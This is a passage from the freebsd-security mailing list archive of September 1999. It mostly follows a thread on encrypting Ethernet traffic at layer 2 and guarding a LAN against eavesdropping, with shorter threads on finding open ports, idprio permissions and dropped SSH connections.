Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org grub wrote: > dmp@aracnet.com wrote: > > In order: > > > > A machine on the network can't see any other machine other that it's > > firewall interface until the DC authorizes it's presence. > > > > Managed switches aren't used, we haven't found one that can provide > > a high enough level of security. > > > > The server rooms already are locked. > > This is an interesting thread but I have a solution: "Sneaker Net" :) We found that most of us would require unhealthy amounts of anabolic steroids and intense weight training to achieve sufficient bandwidth. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 8 1:10:13 1999 Delivered-To: freebsd-security@freebsd.org Received: from guppy.pond.net (guppy.pond.net [205.240.25.2]) by hub.freebsd.org (Postfix) with ESMTP id 332B014F6C for ; Wed, 8 Sep 1999 01:10:08 -0700 (PDT) (envelope-from dmp@aracnet.com) Received: from aracnet.com (snapuser2-89.pacificcrest.net [216.36.34.89]) by guppy.pond.net (8.9.3/8.9.3) with ESMTP id BAA11745; Wed, 8 Sep 1999 01:03:48 -0700 (PDT) From: dmp@aracnet.com Message-ID: <37D61900.E0E8144C@aracnet.com> Date: Wed, 08 Sep 1999 01:06:24 -0700 X-Mailer: Mozilla 4.6 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: James Wyatt Cc: David Miner , "Rodney W. Grimes" , ck@adsu.bellsouth.com, bryan@valiant.cis.hcc.cc.il.us, freebsd-security@FreeBSD.ORG Subject: Re: Layer 2 ethernet encryption? References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org James Wyatt wrote: > > There are nice 10bT to fiber (fibre in the UK) converters in the BlackBox > catalog (catalogue). You chould put these oh-so-close to the router or > switch in the equipment space - maybe even braid the 10bT cables to > confuse any listeners there. Then 10bF cards in the machines ensure no EMI > emitted in the unsecure area. - Jy@ You'll still have EM leakage at the converter and insecure traffic. Plus, you can tap a fibre line almost as easily as you can tap a UTP line. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 8 1:30:59 1999 Delivered-To: freebsd-security@freebsd.org Received: from guppy.pond.net (guppy.pond.net [205.240.25.2]) by hub.freebsd.org (Postfix) with ESMTP id 5646415602 for ; Wed, 8 Sep 1999 01:30:55 -0700 (PDT) (envelope-from dmp@aracnet.com) Received: from aracnet.com (snapuser2-89.pacificcrest.net [216.36.34.89]) by guppy.pond.net (8.9.3/8.9.3) with ESMTP id BAA13343; Wed, 8 Sep 1999 01:26:54 -0700 (PDT) From: dmp@aracnet.com Message-ID: <37D61E69.58B806DF@aracnet.com> Date: Wed, 08 Sep 1999 01:29:29 -0700 X-Mailer: Mozilla 4.6 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: The Mad Scientist Cc: ks@itp.ac.ru, freebsd-security@FreeBSD.ORG Subject: Re: Layer 2 ethernet encryption? References: <4.1.19990907190442.0096ada0@mail.thegrid.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The Mad Scientist wrote: > I do not claim to understand driver writing, but what about ripping out > the code that puts the NIC into promiscous mode? I'm not a software hacker, so I couldn't tell you if that would work, but disabling that part of the driver might not be such a good idea. > You would have to modify > the code that allows the driver to change its MAC address, probably. But > if you have good network monitors, you should be able to detect a machine > that is pretending to be someone else pretty quickly. It's not encryption, > but if you're blind, you can't read the written word. It doesn't solve > your EM problems either. If a NIC changed it's MAC, it would loose connectivity. > 'Course, I guess any user with half a brain could go out and get the > original driver and put it in place -- this being an open source solution. > So, I guess it's not such a good idea after all. Integrity checks withstanding, such a modification would prevent the machine from connecting to the network. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 8 1:36:46 1999 Delivered-To: freebsd-security@freebsd.org Received: from smtp.interact.se (smtp1.interact.se [193.15.98.9]) by hub.freebsd.org (Postfix) with ESMTP id 2A95214E6B for ; Wed, 8 Sep 1999 01:36:39 -0700 (PDT) (envelope-from je@interact.se) Received: from wolfie.interact.se (wolfie.interact.se [193.15.98.202]) by smtp.interact.se (InterACT Mailer) with ESMTP id KAA21233; Wed, 8 Sep 1999 10:34:48 +0200 (CEST) Date: Wed, 8 Sep 1999 10:35:20 +0200 (CEST) From: Jonas Eriksson To: dmp@aracnet.com Cc: The Mad Scientist , ks@itp.ac.ru, freebsd-security@FreeBSD.ORG Subject: Re: Layer 2 ethernet encryption? In-Reply-To: <37D61E69.58B806DF@aracnet.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 8 Sep 1999 dmp@aracnet.com wrote: > The Mad Scientist wrote: > > > I do not claim to understand driver writing, but what about ripping out > > the code that puts the NIC into promiscous mode? > > I'm not a software hacker, so I couldn't tell you if that would work, > but disabling that part of the driver might not be such a good idea. > There is some cards on the market that you can't set to promisc mode. Maybe someone on the list has more information about this? -- Jonas Eriksson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 8 1:48:49 1999 Delivered-To: freebsd-security@freebsd.org Received: from guppy.pond.net (guppy.pond.net [205.240.25.2]) by hub.freebsd.org (Postfix) with ESMTP id 78E6F14EF3 for ; Wed, 8 Sep 1999 01:48:45 -0700 (PDT) (envelope-from dmp@aracnet.com) Received: from aracnet.com (snapuser2-89.pacificcrest.net [216.36.34.89]) by guppy.pond.net (8.9.3/8.9.3) with ESMTP id BAA14282; Wed, 8 Sep 1999 01:42:41 -0700 (PDT) From: dmp@aracnet.com Message-ID: <37D6221D.82C57D6B@aracnet.com> Date: Wed, 08 Sep 1999 01:45:17 -0700 X-Mailer: Mozilla 4.6 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: "Sergey S. Kosyakov" Cc: freebsd-security@FreeBSD.ORG, Garrett Wollman Subject: Re: Layer 2 ethernet encryption? References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Sergey S. Kosyakov" wrote: >> Short of winning a significant lottery, it would be economically >> impossible to move the network to fibre, there's too many nodes to >> upgrade. > > Security was always expensive :-) More security, more expensies. True, but the resources needed for the upgrade are well beyond our means. >> The network currently can't be segmented any more than it is without >> breaking it's applications. > > 1. I don't undestand. What do you mean "breaking it's applications". The applications we run would cease to work properly if the network was segmented any more than it already is. > 2. Do you thing about huge CPUs load on each host in the case of "too many > nodes"? In the case of layer2 encryption each host must decrypt each packet in > the segment, or at least each packet header. CPU power isn't a concern. Encryption would be handled by the cypher chip, not the CPU, and the MAC address wouldn't be encrypted. The cypher encrypts layers 3 and up. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 8 1:49:15 1999 Delivered-To: freebsd-security@freebsd.org Received: from guppy.pond.net (guppy.pond.net [205.240.25.2]) by hub.freebsd.org (Postfix) with ESMTP id 51DB614E23 for ; Wed, 8 Sep 1999 01:49:12 -0700 (PDT) (envelope-from dmp@aracnet.com) Received: from aracnet.com (snapuser2-89.pacificcrest.net [216.36.34.89]) by guppy.pond.net (8.9.3/8.9.3) with ESMTP id BAA14325; Wed, 8 Sep 1999 01:44:01 -0700 (PDT) From: dmp@aracnet.com Message-ID: <37D6226D.9AC89FAC@aracnet.com> Date: Wed, 08 Sep 1999 01:46:37 -0700 X-Mailer: Mozilla 4.6 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: Nikolaus Spence Cc: freebsd-security@freebsd.org Subject: Re: Layer 2 ethernet encryption? References: <85D42D7EE2DAD2119CD400A0C9E1004F64F69A@exchange.eci.us.geac.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Nikolaus Spence wrote: >>> How would you route the traffic? No routers would be able to pass the >>> traffic. >> >> The network in question doesn't use IP-based routing. > > If you aren't using IP based routing then aren't your packets going to be > encapsulated already? how ARE you routing your packets??? By MAC address. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 8 1:54:43 1999 Delivered-To: freebsd-security@freebsd.org Received: from nsm.htp.org (nsm.htp.org [202.241.243.104]) by hub.freebsd.org (Postfix) with SMTP id 58FCE14D2F for ; Wed, 8 Sep 1999 01:54:30 -0700 (PDT) (envelope-from sen_ml@eccosys.com) Received: (qmail 19143 invoked from network); 8 Sep 1999 08:47:45 -0000 Received: from localhost (127.0.0.1) by localhost with SMTP; 8 Sep 1999 08:47:45 -0000 To: freebsd-security@FreeBSD.ORG Subject: Re: Layer 2 ethernet encryption? From: sen_ml@eccosys.com In-Reply-To: <37D4AB40.AEE4C2EA@aracnet.com> References: <39480.936682378@noop.colo.erols.net> <37D4AB40.AEE4C2EA@aracnet.com> X-Mailer: Mew version 1.94 on Emacs 20.3 / Mule 4.0 (HANANOEN) X-No-Archive: Yes Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-Id: <19990908174703U.1000@eccosys.com> Date: Wed, 08 Sep 1999 17:47:03 +0900 X-Dispatcher: imput version 990905(IM130) Lines: 13 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org dmp> Gary Palmer wrote: dmp> > If you are doing this for a local LAN, I suggest you have bigger dmp> > problems :) dmp> You're right, I do have bigger problems. Like deep paranoia among dmp> the users of the LAN. please take the following as humor: so, what are you going to do when they find out about tempest -- are you going to get special crts/displays? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 8 1:56:11 1999 Delivered-To: freebsd-security@freebsd.org Received: from netserv1.chg.ru (netserv1.chg.ru [193.233.46.3]) by hub.freebsd.org (Postfix) with ESMTP id A788E15B07 for ; Wed, 8 Sep 1999 01:55:57 -0700 (PDT) (envelope-from ks@chg.ru) Received: from speecart.chg.ru (speecart.chg.ru [193.233.46.2]) by netserv1.chg.ru (8.9.3/8.9.1) with ESMTP id MAA46041; Wed, 8 Sep 1999 12:54:49 +0400 (MSD) Message-ID: X-Mailer: XFMail 1.3 [p0] on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=KOI8-R Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: <37D6221D.82C57D6B@aracnet.com> Date: Wed, 08 Sep 1999 12:52:17 +0400 (MSD) Organization: Landau Institute for Theoretical Physics From: "Sergey S. Kosyakov" To: dmp@aracnet.com Subject: Re: Layer 2 ethernet encryption? Cc: Garrett Wollman , freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 08-Sep-99 dmp@aracnet.com wrote: >>> The network currently can't be segmented any more than it is without >>> breaking it's applications. >> >> 1. I don't undestand. What do you mean "breaking it's applications". > > The applications we run would cease to work properly if the network > was segmented any more than it already is. Ok, may be we have different undestanding of word "network segment". Who knows network application which can not run on ethernet network, connected to switch (except shiffers, of cause :-))? It is almost the right, that switch simply supress unneeded ethernet packets, and threfore makes network more secure. > >> 2. Do you thing about huge CPUs load on each host in the case of "too many >> nodes"? In the case of layer2 encryption each host must decrypt each packet >> in >> the segment, or at least each packet header. > > CPU power isn't a concern. Encryption would be handled by the cypher > chip, not the CPU, and the MAC address wouldn't be encrypted. The > cypher encrypts layers 3 and up. If MAC addresses wouldn't be encrypted, why not to use well-known encryption soft, e.g. SSH or TUND or IPSec? --- ---------------------------------- Sergey Kosyakov Laboratory of Distributed Computing Department of High-Performance Computing and Applied Network Research Landau Institute for Theoretical Physics E-Mail: ks@chg.ru Date: 08-Sep-99 Time: 12:45:52 ---------------------------------- --- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 8 1:56:59 1999 Delivered-To: freebsd-security@freebsd.org Received: from netserv1.chg.ru (netserv1.chg.ru [193.233.46.3]) by hub.freebsd.org (Postfix) with ESMTP id BFEE715B32 for ; Wed, 8 Sep 1999 01:56:40 -0700 (PDT) (envelope-from ks@chg.ru) Received: from speecart.chg.ru (speecart.chg.ru [193.233.46.2]) by netserv1.chg.ru (8.9.3/8.9.1) with ESMTP id MAA46053; Wed, 8 Sep 1999 12:55:49 +0400 (MSD) Message-ID: X-Mailer: XFMail 1.3 [p0] on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=KOI8-R Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: <37D6226D.9AC89FAC@aracnet.com> Date: Wed, 08 Sep 1999 12:53:17 +0400 (MSD) Organization: Landau Institute for Theoretical Physics From: "Sergey S. Kosyakov" To: dmp@aracnet.com Subject: Re: Layer 2 ethernet encryption? Cc: freebsd-security@FreeBSD.ORG, Nikolaus Spence Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 08-Sep-99 dmp@aracnet.com wrote: > Nikolaus Spence wrote: >>>> How would you route the traffic? No routers would be able to pass the >>>> traffic. >>> >>> The network in question doesn't use IP-based routing. >> >> If you aren't using IP based routing then aren't your packets going to be >> encapsulated already? how ARE you routing your packets??? > > By MAC address. This is ethernet switch exactly :-) --- ---------------------------------- Sergey Kosyakov Laboratory of Distributed Computing Department of High-Performance Computing and Applied Network Research Landau Institute for Theoretical Physics E-Mail: ks@chg.ru Date: 08-Sep-99 Time: 12:52:56 ---------------------------------- --- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 8 2: 2:38 1999 Delivered-To: freebsd-security@freebsd.org Received: from metriclient-1.uoregon.edu (metriclient-1.uoregon.edu [128.223.172.1]) by hub.freebsd.org (Postfix) with ESMTP id 3BE5714F2B for ; Wed, 8 Sep 1999 02:02:27 -0700 (PDT) (envelope-from gurney_j@efn.org) Received: (from jmg@localhost) by metriclient-1.uoregon.edu (8.9.1/8.8.7) id CAA23129; Wed, 8 Sep 1999 02:01:38 -0700 (PDT) Message-ID: <19990908020138.50271@hydrogen.fircrest.net> Date: Wed, 8 Sep 1999 02:01:38 -0700 From: John-Mark Gurney To: Dag-Erling Smorgrav Cc: freebsd-security@FreeBSD.ORG Subject: Re: Tracing open ports on FreeBSD References: <36622.936445305@verdi.nethelp.no> <28018.936617908@axl.noc.iafrica.com> <19990907122621.30662@hydrogen.fircrest.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.69 In-Reply-To: ; from Dag-Erling Smorgrav on Wed, Sep 08, 1999 at 09:49:24AM +0200 Reply-To: John-Mark Gurney Organization: Cu Networking X-Operating-System: FreeBSD 3.0-RELEASE i386 X-PGP-Fingerprint: B7 EC EF F8 AE ED A7 31 96 7A 22 B3 D8 56 36 F4 X-Files: The truth is out there X-URL: http://resnet.uoregon.edu/~gurney_j/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Dag-Erling Smorgrav scribbled this message on Sep 8: > John-Mark Gurney writes: > > no, but we should include a reference to fstat... you can track down > > who had a udp socket open, but for some reason the addresses on my 3.0-R > > box for tcp streams outputed by netstat don't agree w/ any of the > > addresses that exist in the fstat output... > > I fixed that bug a long time ago. What are you doing still running > 3.0-R, anyway? because it's my gateway, and I haven't had time to try to run instable releases like 3.1-R that had a swap problem... and I have been to busy to try to upgrade to 3.2-R... I just reciently built a couple new boxes that I will be running -current and -stable on, but one of them running 3.2-R panic's in process 1 (swapper) upon bootup w/o fail... on top of all of this, I'm in the process of moving the SF Bay area... > > looks like I should extend the description of -A to include a blurb > > about identifing processes which own a socket/stream... > > Why? What's wrong with sockstat? I just noticed that it is in both -stable and -current, there isn't a problem, but still, it's useful to know multiple ways to do something.. -- John-Mark Gurney Voice: +1 541 684 8449 Cu Networking P.O. Box 5693, 97405 "The soul contains in itself the event that shall presently befall it. The event is only the actualizing of its thought." -- Ralph Waldo Emerson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 8 2:33:52 1999 Delivered-To: freebsd-security@freebsd.org Received: from axl.noc.iafrica.com (axl.noc.iafrica.com [196.31.1.175]) by hub.freebsd.org (Postfix) with ESMTP id 06A9914F97 for ; Wed, 8 Sep 1999 02:33:42 -0700 (PDT) (envelope-from sheldonh@axl.noc.iafrica.com) Received: from sheldonh (helo=axl.noc.iafrica.com) by axl.noc.iafrica.com with local-esmtp (Exim 3.02 #1) id 11Oe5E-000FXx-00; Wed, 08 Sep 1999 11:32:04 +0200 From: Sheldon Hearn To: John-Mark Gurney Cc: sthaug@nethelp.no, madrapour@hotmail.com, freebsd-security@FreeBSD.ORG Subject: Re: Tracing open ports on FreeBSD In-reply-to: Your message of "Tue, 07 Sep 1999 12:26:21 MST." <19990907122621.30662@hydrogen.fircrest.net> Date: Wed, 08 Sep 1999 11:32:04 +0200 Message-ID: <59764.936783124@axl.noc.iafrica.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 07 Sep 1999 12:26:21 MST, John-Mark Gurney wrote: > no, but we should include a reference to fstat... See rev 1.16 of netstat.1 . :-) Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 8 3:13:58 1999 Delivered-To: freebsd-security@freebsd.org Received: from alfik.ms.mff.cuni.cz (alfik.ms.mff.cuni.cz [195.113.19.71]) by hub.freebsd.org (Postfix) with ESMTP id C351C14CE7 for ; Wed, 8 Sep 1999 03:13:46 -0700 (PDT) (envelope-from mencl@nenya.ms.mff.cuni.cz) Received: from nenya.ms.mff.cuni.cz by alfik.ms.mff.cuni.cz; (8.8.8/v1.00/19990210.0854) id MAA12401; Wed, 8 Sep 1999 12:13:01 +0200 (MET DST) Received: from localhost (mencl@localhost) by nenya.ms.mff.cuni.cz (8.9.1b+Sun/8.9.1) with ESMTP id MAA04611 for ; Wed, 8 Sep 1999 12:12:57 +0200 (MET DST) Date: Wed, 8 Sep 1999 12:12:57 +0200 (MET DST) From: "Vladimir Mencl, MK, susSED" To: freebsd-security@FreeBSD.ORG Subject: Q: Why is idprio only for root Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Why is the idprio(1) command available only to the superuser? What where the reasons? It just seems to me that it's no evil to let users run some computations on the idle priority.... when they want to load the system less then with a nice(1). Vlada Mencl To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 8 3:37: 0 1999 Delivered-To: freebsd-security@freebsd.org Received: from metriclient-1.uoregon.edu (metriclient-1.uoregon.edu [128.223.172.1]) by hub.freebsd.org (Postfix) with ESMTP id 0378814E75 for ; Wed, 8 Sep 1999 03:36:52 -0700 (PDT) (envelope-from gurney_j@efn.org) Received: (from jmg@localhost) by metriclient-1.uoregon.edu (8.9.1/8.8.7) id DAA24713; Wed, 8 Sep 1999 03:35:50 -0700 (PDT) Message-ID: <19990908033550.02417@hydrogen.fircrest.net> Date: Wed, 8 Sep 1999 03:35:50 -0700 From: John-Mark Gurney To: "Vladimir Mencl, MK, susSED" Cc: freebsd-security@FreeBSD.ORG Subject: Re: Q: Why is idprio only for root References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.69 In-Reply-To: ; from Vladimir Mencl, MK, susSED on Wed, Sep 08, 1999 at 12:12:57PM +0200 Reply-To: John-Mark Gurney Organization: Cu Networking X-Operating-System: FreeBSD 3.0-RELEASE i386 X-PGP-Fingerprint: B7 EC EF F8 AE ED A7 31 96 7A 22 B3 D8 56 36 F4 X-Files: The truth is out there X-URL: http://resnet.uoregon.edu/~gurney_j/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Vladimir Mencl, MK, susSED scribbled this message on Sep 8: > Why is the idprio(1) command available only to the superuser? > > What where the reasons? > > It just seems to me that it's no evil to let users run some computations > on the idle priority.... when they want to load the system less then > with a nice(1). because there is a situation where a idle prio process can obtain a lock on a vnode or other kernel resource, but never get the chance to run again while a higher level process continues working... do a search of the mailing lists on this topic... it shouldn't be hard to turn up... it would most likely be on -hackers -- John-Mark Gurney Voice: +1 541 684 8449 Cu Networking P.O. Box 5693, 97405 "The soul contains in itself the event that shall presently befall it. The event is only the actualizing of its thought." -- Ralph Waldo Emerson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 8 7:21:43 1999 Delivered-To: freebsd-security@freebsd.org Received: from guppy.pond.net (guppy.pond.net [205.240.25.2]) by hub.freebsd.org (Postfix) with ESMTP id 5A6C015BAD for ; Wed, 8 Sep 1999 07:21:41 -0700 (PDT) (envelope-from dmp@aracnet.com) Received: from aracnet.com (snapuser2-89.pacificcrest.net [216.36.34.89]) by guppy.pond.net (8.9.3/8.9.3) with ESMTP id HAA06915; Wed, 8 Sep 1999 07:18:03 -0700 (PDT) From: dmp@aracnet.com Message-ID: <37D670BB.51A150D7@aracnet.com> Date: Wed, 08 Sep 1999 07:20:43 -0700 X-Mailer: Mozilla 4.6 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: sen_ml@eccosys.com Cc: freebsd-security@FreeBSD.ORG Subject: Re: Layer 2 ethernet encryption? References: <39480.936682378@noop.colo.erols.net> <37D4AB40.AEE4C2EA@aracnet.com> <19990908174703U.1000@eccosys.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org sen_ml@eccosys.com wrote: > > dmp> Gary Palmer wrote: > > dmp> > If you are doing this for a local LAN, I suggest you have bigger > dmp> > problems :) > > dmp> You're right, I do have bigger problems. Like deep paranoia among > dmp> the users of the LAN. > > please take the following as humor: > > so, what are you going to do when they find out about tempest -- > are you going to get special crts/displays? You didn't really think we didn't already have them, did you? :-) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 8 8: 2:12 1999 Delivered-To: freebsd-security@freebsd.org Received: from peak.mountin.net (peak.mountin.net [207.227.119.2]) by hub.freebsd.org (Postfix) with ESMTP id 836C314C12 for ; Wed, 8 Sep 1999 08:02:09 -0700 (PDT) (envelope-from jeff-ml@mountin.net) Received: (from daemon@localhost) by peak.mountin.net (8.9.1/8.9.1) id KAA15919; Wed, 8 Sep 1999 10:01:16 -0500 (CDT) (envelope-from jeff-ml@mountin.net) Received: from dial-192.tnt1.rac.cyberlynk.net(209.224.182.192) by peak.mountin.net via smap (V1.3) id sma015917; Wed Sep 8 10:01:11 1999 Message-Id: <3.0.3.32.19990908100024.01d18800@207.227.119.2> X-Sender: jeff-ml@207.227.119.2 X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.3 (32) Date: Wed, 08 Sep 1999 10:00:24 -0500 To: dmp@aracnet.com From: "Jeffrey J. Mountin" Subject: Re: Layer 2 ethernet encryption? Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <37D61900.E0E8144C@aracnet.com> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 01:06 AM 9/8/99 -0700, dmp@aracnet.com wrote: >James Wyatt wrote: >> >> There are nice 10bT to fiber (fibre in the UK) converters in the BlackBox >> catalog (catalogue). You chould put these oh-so-close to the router or >> switch in the equipment space - maybe even braid the 10bT cables to >> confuse any listeners there. Then 10bF cards in the machines ensure no EMI >> emitted in the unsecure area. - Jy@ > >You'll still have EM leakage at the converter and insecure traffic. >Plus, you can tap a fibre line almost as easily as you can tap a UTP >line. Grounded shield at the converter would solve the EM, but would make moving connections a real pain. As for the tapping, it would require a break in the line and that can be monitored for, but again the expenses go up. Still if the conduits are in the building, do not use exterior walls, and access is limited... Gotta face the fact that one way or the other there is no cheap, easy solution. One has to wonder why security is so paramount (barring you admitted paranoia). Or does that require a clearance. 8-) As for anothers mention of TEMPEST, you should check out: http://www.eskimo.com/~joelm/tempest.html This should add a bit to my first suggestion on EM. Jeff Mountin - jeff@mountin.net Systems/Network Administrator FreeBSD - the power to serve '86 Yamaha MaxiumX (not FBSD powered) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 8 9:22:44 1999 Delivered-To: freebsd-security@freebsd.org Received: from guppy.pond.net (guppy.pond.net [205.240.25.2]) by hub.freebsd.org (Postfix) with ESMTP id 5147614DC1 for ; Wed, 8 Sep 1999 09:22:38 -0700 (PDT) (envelope-from dmp@aracnet.com) Received: from aracnet.com (snapuser2-89.pacificcrest.net [216.36.34.89]) by guppy.pond.net (8.9.3/8.9.3) with ESMTP id JAA22349; Wed, 8 Sep 1999 09:19:08 -0700 (PDT) From: dmp@aracnet.com Message-ID: <37D68D1D.14D6CAC7@aracnet.com> Date: Wed, 08 Sep 1999 09:21:49 -0700 X-Mailer: Mozilla 4.6 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: "Jeffrey J. Mountin" Cc: freebsd-security@FreeBSD.ORG Subject: Re: Layer 2 ethernet encryption? References: <3.0.3.32.19990908100024.01d18800@207.227.119.2> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Jeffrey J. Mountin" wrote: > At 01:06 AM 9/8/99 -0700, dmp@aracnet.com wrote: >>James Wyatt wrote: >>> >>> There are nice 10bT to fiber (fibre in the UK) converters in the BlackBox >>> catalog (catalogue). You chould put these oh-so-close to the router or >>> switch in the equipment space - maybe even braid the 10bT cables to >>> confuse any listeners there. Then 10bF cards in the machines ensure no EMI >>> emitted in the unsecure area. - Jy@ >> >>You'll still have EM leakage at the converter and insecure traffic. >>Plus, you can tap a fibre line almost as easily as you can tap a UTP >>line. > > Grounded shield at the converter would solve the EM, but would make moving > connections a real pain. That's why we have technical assistants. :-) > One has to wonder why security is so paramount (barring you admitted > paranoia). Or does that require a clearance. 8-) What, you mean I have to actually *have* a reason for all this? ;) > As for anothers mention of TEMPEST, you should check out: > > http://www.eskimo.com/~joelm/tempest.html Coincidentally, I already had that page bookmarked. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 8 17:22: 6 1999 Delivered-To: freebsd-security@freebsd.org Received: from w2xo.pgh.pa.us (4.npt-sdsl.stargate.net [208.223.229.4]) by hub.freebsd.org (Postfix) with ESMTP id 523C614D4B for ; Wed, 8 Sep 1999 17:22:00 -0700 (PDT) (envelope-from durham@w2xo.pgh.pa.us) Received: (from durham@localhost) by w2xo.pgh.pa.us (8.9.2/8.9.1) id AAA27391 for freebsd-security@freebsd.org; Thu, 9 Sep 1999 00:21:04 GMT (envelope-from durham) Date: Thu, 9 Sep 1999 00:21:04 GMT From: "James C. Durham" Message-Id: <199909090021.AAA27391@w2xo.pgh.pa.us> To: freebsd-security@freebsd.org Subject: ssh disconnects Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I have ssh forwarding ports from a machine on the internet to another machine with a private IP here at my house. Everything works fine, except that the connection drops at irregular intervals, from 20 minutes to 2 or 3 days with a "connection reset by peer" message. I've experimented with keepalive and timeout in the config stuff to no avail. The only thing that seems to help is to run a script that sends the date from the remote server every 10 seconds. This makes it stay up for a couple days. What's going on here? Any ideas? It's very annoying.. -Jim Durham To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Sep 8 21:55:10 1999 Delivered-To: freebsd-security@freebsd.org Received: from mta1.snfc21.pbi.net (mta1.snfc21.pbi.net [206.13.28.122]) by hub.freebsd.org (Postfix) with ESMTP id 1C9B8157AB for ; Wed, 8 Sep 1999 21:55:07 -0700 (PDT) (envelope-from dean@thegrid.net) Received: from remus (adsl-63-193-246-169.dsl.snfc21.pacbell.net) by mta1.snfc21.pbi.net (Sun Internet Mail Server sims.3.5.1999.05.24.18.28.p7) with SMTP id <0FHS00M6D0BB45@mta1.snfc21.pbi.net> for freebsd-security@freebsd.org; Wed, 8 Sep 1999 21:54:48 -0700 (PDT) Date: Wed, 08 Sep 1999 21:53:14 -0700 From: Dean Subject: Re: Layer 2 ethernet encryption? In-reply-to: <37D61E69.58B806DF@aracnet.com> X-Sender: i393382@mail.thegrid.net To: freebsd-security@freebsd.org Message-id: <4.1.19990908213955.009651a0@mail.thegrid.net> MIME-version: 1.0 X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Content-type: text/plain; charset="us-ascii" References: <4.1.19990907190442.0096ada0@mail.thegrid.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 01:29 AM 9/8/99 -0700, you wrote: >The Mad Scientist 